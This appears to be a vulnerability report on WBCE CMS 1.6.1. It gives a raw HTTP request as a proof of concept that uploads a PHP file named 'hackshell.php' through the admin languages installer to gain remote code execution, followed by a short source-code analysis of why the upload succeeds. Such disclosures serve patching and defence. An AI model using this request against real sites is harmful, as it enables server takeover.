By downloading https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 After the construction is completed
Vulnerability lies in http://127.0.0.1/admin/languages/index.php
Attackers can upload PHP files, causing RCE
POC:
POST /admin/languages/install.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------382321890310304369272830113203
Content-Length: 533
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin/languages/index.php
Cookie: Hm_lvt_a8569fd6981018f096d774868306a054=1686458094; phpsessid-5824-sid=6rlf8lsb2ie7v7esbf7707s78a; WBCELastConnectJS=1689493731; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------382321890310304369272830113203
Content-Disposition: form-data; name="formtoken"
6992839a-84ca0426bd85508b058b9cfc930b714cc143b3e9
-----------------------------382321890310304369272830113203
Content-Disposition: form-data; name="userfile"; filename="hackshell.php"
Content-Type: application/octet-stream
Your PHP code, I am executing system ('ipconfig ') here
-----------------------------382321890310304369272830113203
Content-Disposition: form-data; name="submit"
-----------------------------382321890310304369272830113203--
Vulnerability source code analysis:
Analyze the source code under/admin/languages/install.php
Starting from line 47, it is a file upload function
The vulnerability mainly occurs at line 78, which does not restrict files with a PHP suffix. After uploading a PHP file, the attacker determines the 'if' statement on line 82 and enters the 'require' function to include the file, resulting in RCE. Afterwards, the attacker abnormally enters the 'print' function_ Error generates an exception output. After the upgrade page is updated in line 89, it will enter line 90 for the unlink function. Therefore, our code execution can only be a one-time effect and cannot be saved for a long time